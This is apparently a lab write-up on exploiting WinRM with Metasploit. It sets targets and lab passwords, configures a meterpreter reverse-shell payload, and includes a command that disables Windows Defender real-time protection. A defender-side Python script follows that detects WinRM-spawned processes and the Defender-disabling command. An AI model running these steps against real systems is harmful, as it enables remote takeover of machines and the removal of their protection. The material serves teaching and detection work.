- In a Windows-based environment, IT professionals often require the ability to remotely manage and execute commands on other Windows-based devices. For this purpose, they rely on a common protocol or application like Web Services Management (WS-Management). WS-Management allows for the exchange of management information across different operating systems and services on a network. Notably, Microsoft has developed its own implementation of the WS-Management protocol, known as Windows Remote Management (WinRM), tailored specifically for Microsoft Windows operating systems.
Exploitation:
- Open Kali for scanning and exploitation:

- Open up msfconsole for the exploitation part:
sudo msfconsole
use auxiliary/scanner/winrm/winrm_cmd
msf auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 192.168.83.140
RHOSTS => 192.168.83.140
msf auxiliary(scanner/winrm/winrm_cmd) > set USERNAME Administrator
USERNAME => Administrator
msf auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD P@ssword1
PASSWORD => P@ssword1
- By default, the command the module will execute is:
ipconfig /all

- Remember the setup of the local user for WinRM access, where we gave access to the user sysadmin; let’s try that:

- It actually worked.
- Now let’s try for a remote shell:
msf6 > use exploit/windows/winrm/winrm_script_exec
msf6 exploit(windows/winrm/winrm_script_exec) > set RHOSTS 192.168.83.140
msf6 exploit(windows/winrm/winrm_script_exec) > set LHOST 192.168.83.128
- Also turn off real-time protection on your Windows server, because it will quarantine the execution.
- Use this command in PowerShell on your DC:
Set-MpPreference -DisableRealtimeMonitoring $true
3. After selecting the exploit/windows/winrm/winrm_script_exec module, a reverse shell payload was automatically coupled with the exploit module within Metasploit.
4. To give the exploit/windows/winrm/winrm_script_exec module a better chance of success, force it to use the VBS CmdStager (FORCE_VBS) if your target is an old system; otherwise leave it set to false. Let’s look at the options:
msf exploit(windows/winrm/winrm_script_exec) > set DOMAIN REDTEAMLAB
DOMAIN => REDTEAMLAB
msf exploit(windows/winrm/winrm_script_exec) > set USERNAME Administrator
USERNAME => Administrator
msf exploit(windows/winrm/winrm_script_exec) > set PASSWORD Password123
PASSWORD => Password123
msf exploit(windows/winrm/winrm_script_exec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/winrm/winrm_script_exec) > set FORCE_VBS false
FORCE_VBS => false

- Run the exploit:
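As an added defender-side example (not part of this write-up and not Metasploit code), the script below shows how the activity above looks in the target's process-creation telemetry: commands executed through WinRM are spawned by wsmprovhost.exe, the WS-Management plugin host, and the Set-MpPreference step leaves a recognisable command line. The field names follow Sysmon Event ID 1 and the sample records are constructed for the example.

```python
"""Flag WinRM-spawned processes and Defender real-time protection tampering.

Added example, not from the original write-up. Records are constructed
Sysmon-style process-creation events (Image, ParentImage, CommandLine, User).
"""
import re

# Commands executed over WinRM (winrs, PowerShell remoting, winrm_cmd) run as
# children of the WS-Management plugin host.
WINRM_HOST = "wsmprovhost.exe"

# Set-MpPreference -DisableRealtimeMonitoring $true switches off Defender real-time
# protection; match it case-insensitively and with either $true or 1.
DEFENDER_OFF = re.compile(
    r"set-mppreference\s+.*-disablerealtimemonitoring\s+(\$true|1)", re.I)


def classify(event):
    """Return the list of finding tags for one process-creation record."""
    findings = []
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    if parent == WINRM_HOST:
        # Legitimate admins use WinRM too; baseline by user/source before alerting.
        findings.append("winrm_child_process")
    if DEFENDER_OFF.search(event.get("CommandLine", "")):
        findings.append("defender_realtime_disabled")
    return findings


def triage(events):
    """Return (user, image, tags) for every record that produced a finding."""
    return [(e["User"], e["Image"], tags) for e in events if (tags := classify(e))]


# Constructed sample: the winrm_cmd default `ipconfig /all` run via WinRM, the
# local Set-MpPreference step from the lab, and one benign interactive process.
SAMPLE_EVENTS = [
    {"User": "REDTEAMLAB\\Administrator",
     "Image": r"C:\Windows\System32\ipconfig.exe",
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe",
     "CommandLine": "ipconfig /all"},
    {"User": "REDTEAMLAB\\Administrator",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"User": "REDTEAMLAB\\svc_backup",
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe report.txt"},
]

if __name__ == "__main__":
    for user, image, tags in triage(SAMPLE_EVENTS):
        print(f"{user} {image} -> {', '.join(tags)}")
```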
